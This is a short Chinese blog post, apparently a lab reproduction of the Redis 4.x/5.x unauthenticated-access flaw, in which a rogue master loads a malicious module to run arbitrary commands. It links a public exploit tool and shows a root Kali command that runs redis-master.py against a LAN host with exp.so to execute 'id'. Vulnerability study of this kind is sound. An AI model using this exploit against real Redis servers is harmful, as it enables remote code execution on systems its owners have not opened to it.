Redis 4.x/5.x 未授权访问漏洞
基本知识
- Redis非关系型数据库,
- 默认开放端口是6379端口,
- 配置文件位置为 /etc/redis/redis.conf
- Redis 的数据存于内存中,所以读写速度非常快,被广泛应用于缓存方向
- 高性能的key-value存储系统
- Redis默认是不需要账号密码
存在未授权访问漏洞
漏洞介绍
Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
漏洞复现
-
exp
https://github.com/vulhub/redis-rogue-getshell
-
编译
-
查看帮助信息
-
利用
┌──(root㉿kali)-[/home/roott/桌面/redis-rogue-getshell-master]
└─# python3 redis-master.py -r 192.168.1.9 -p 6379 -L 192.168.1.9 -f RedisModulesSDK/exp.so -c "id"
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人